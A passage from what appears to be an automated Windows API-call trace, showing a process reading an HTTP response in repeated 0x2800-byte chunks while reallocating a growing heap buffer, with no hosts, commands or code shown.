lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9d7f040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0122.479] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x104000) returned 0x9850040 [0122.498] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9951840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9951840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0122.498] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9850040, Size=0x106800) returned 0x9c80040 [0122.581] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9d84040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9d84040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0122.587] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x109000) returned 0x9850040 [0122.631] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9956840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9956840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0122.639] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9850040, Size=0x10b800) returned 0x9c80040 [0122.669] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9d89040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9d89040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0122.677] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x10e000) returned 0x9850040 [0122.763] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x995b840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x995b840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0122.791] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9850040, Size=0x110800) returned 0x9c80040 [0122.815] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9d8e040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9d8e040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0122.816] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x113000) returned 0x9850040 [0122.862] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9960840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9960840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0122.865] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9850040, Size=0x115800) returned 0x9c80040 [0122.923] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9d93040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9d93040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0122.973] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x118000) returned 0x9850040 [0123.009] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9965840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9965840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0123.046] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9850040, Size=0x11a800) returned 0x9c80040 [0123.080] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9d98040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9d98040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0123.082] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x11d000) returned 0x9850040 [0123.110] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x996a840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x996a840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0123.110] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9850040, Size=0x11f800) returned 0x9c80040 [0123.207] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9d9d040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9d9d040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0123.237] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x122000) returned 0x9850040 [0123.263] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x996f840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x996f840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0123.264] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9850040, Size=0x124800) returned 0x9c80040 [0123.291] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9da2040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9da2040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0123.291] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x127000) returned 0x9850040 [0123.318] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9974840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9974840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0123.320] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9850040, Size=0x129800) returned 0x9c80040 [0123.346] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9da7040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9da7040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0123.392] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x12c000) returned 0x9850040 [0123.420] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9979840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9979840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0123.439] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9850040, Size=0x12e800) returned 0x9c80040 [0123.473] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9dac040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9dac040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0123.474] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x131000) returned 0x9850040 [0123.500] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x997e840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x997e840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0123.500] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9850040, Size=0x133800) returned 0x9c80040 [0123.524] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9db1040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9db1040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0123.525] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x136000) returned 0x9850040 [0123.558] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9983840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9983840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0123.597] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9850040, Size=0x138800) returned 0x9c80040 [0123.622] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9db6040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9db6040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0123.640] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x13b000) returned 0x9850040 [0123.665] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9988840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9988840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0123.665] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9850040, Size=0x13d800) returned 0x9c80040 [0123.689] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9dbb040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9dbb040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0123.689] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x140000) returned 0x9850040 [0123.713] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x998d840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x998d840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0123.713] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9850040, Size=0x142800) returned 0x9c80040 [0123.783] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9dc0040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9dc0040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0123.803] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x145000) returned 0x9850040 [0123.829] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9992840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9992840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0123.829] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9850040, Size=0x147800) returned 0x9c80040 [0123.856] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9dc5040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9dc5040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0123.856] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x14a000) returned 0x9850040 [0123.885] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9997840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9997840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0123.890] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9850040, Size=0x14c800) returned 0x9c80040 [0123.927] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9dca040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9dca040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0124.001] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x14f000) returned 0x9850040 [0124.037] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x999c840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x999c840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0124.074] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9850040, Size=0x151800) returned 0x9c80040 [0124.111] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9dcf040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9dcf040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0124.112] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x154000) returned 0x9850040 [0124.177] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x99a1840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x99a1840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0124.220] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9850040, Size=0x156800) returned 0x9c80040 [0124.257] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9dd4040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9dd4040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0124.286] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x159000) returned 0x9850040 [0124.313] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x99a6840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x99a6840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0124.314] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9850040, Size=0x15b800) returned 0x9c80040 [0124.345] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9dd9040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9dd9040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0124.345] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x15e000) returned 0x9850040 [0124.372] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x99ab840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x99ab840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0124.373] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9850040, Size=0x160800) returned 0x9c80040 [0124.400] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9dde040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9dde040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0124.438] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x163000) returned 0x9850040 [0124.468] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x99b0840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x99b0840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0124.489] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9850040, Size=0x165800) returned 0x9c80040 [0124.518] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9de3040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9de3040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0124.518] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x168000) returned 0x9850040 [0124.556] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x99b5840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x99b5840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0124.557] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9850040, Size=0x16a800) returned 0x9c80040 [0124.587] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9de8040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9de8040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0124.588] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x16d000) returned 0x9850040 [0124.665] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x99ba840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x99ba840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0124.681] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9850040, Size=0x16f800) returned 0x9c80040 [0124.709] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9ded040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9ded040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0124.710] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x172000) returned 0x9850040 [0124.737] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x99bf840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x99bf840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0124.738] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9850040, Size=0x174800) returned 0x9c80040 [0124.768] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9df2040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9df2040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0124.769] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x177000) returned 0x9850040 [0124.845] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x99c4840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x99c4840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0124.852] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9850040, Size=0x179800) returned 0x9c80040 [0124.881] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9df7040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9df7040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0124.881] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x17c000) returned 0x9850040 [0124.911] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x99c9840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x99c9840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0124.912] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9850040, Size=0x17e800) returned 0x9c80040 [0124.941] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9dfc040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9dfc040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0124.942] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x181000) returned 0x9850040 [0125.020] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x99ce840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x99ce840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0125.029] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9850040, Size=0x183800) returned 0x9c80040 [0125.058] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9e01040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9e01040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0125.059] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x186000) returned 0x9850040 [0125.087] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x99d3840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x99d3840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0125.088] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9850040, Size=0x188800) returned 0x9c80040 [0125.117] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9e06040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9e06040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0125.118] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x18b000) returned 0x9850040 [0125.194] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x99d8840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x99d8840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0125.209] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9850040, Size=0x18d800) returned 0x9c80040 [0125.239] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9e0b040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9e0b040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0125.239] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x190000) returned 0x9850040 [0125.268] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x99dd840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x99dd840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0125.270] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9850040, Size=0x192800) returned 0x9c80040 [0125.299] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9e10040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9e10040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0125.300] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x195000) returned 0x9850040 [0125.383] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x99e2840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x99e2840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0125.383] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9850040, Size=0x197800) returned 0x9c80040 [0125.413] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9e15040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9e15040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0125.413] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x19a000) returned 0x9850040 [0125.444] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x99e7840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x99e7840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0125.445] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9850040, Size=0x19c800) returned 0x9c80040 [0125.481] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9e1a040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9e1a040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0125.514] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x19f000) returned 0x9850040 [0125.555] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x99ec840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x99ec840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0125.585] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9850040, Size=0x1a1800) returned 0x9c80040 [0125.633] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9e1f040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9e1f040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0125.635] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x1a4000) returned 0x9850040 [0125.673] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x99f1840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x99f1840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0125.674] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9850040, Size=0x1a6800) returned 0x9c80040 [0125.712] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9e24040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9e24040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0125.750] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x1a9000) returned 0x9850040 [0125.790] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x99f6840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x99f6840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0125.825] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9850040, Size=0x1ab800) returned 0x9c80040 [0125.865] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9e29040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9e29040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0125.866] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x1ae000) returned 0x9850040 [0125.905] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x99fb840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x99fb840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0125.906] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9850040, Size=0x1b0800) returned 0x9c80040 [0125.945] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9e2e040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9e2e040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0125.982] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x1b3000) returned 0x9e40040 [0126.024] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9ff0840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9ff0840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0126.057] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9e40040, Size=0x1b5800) returned 0x9c80040 [0126.097] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9e33040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9e33040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0126.097] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x1b8000) returned 0x9e40040 [0126.158] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9ff5840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9ff5840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0126.200] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9e40040, Size=0x1ba800) returned 0x9c80040 [0126.245] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9e38040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9e38040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0126.271] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x1bd000) returned 0x9e40040 [0126.312] 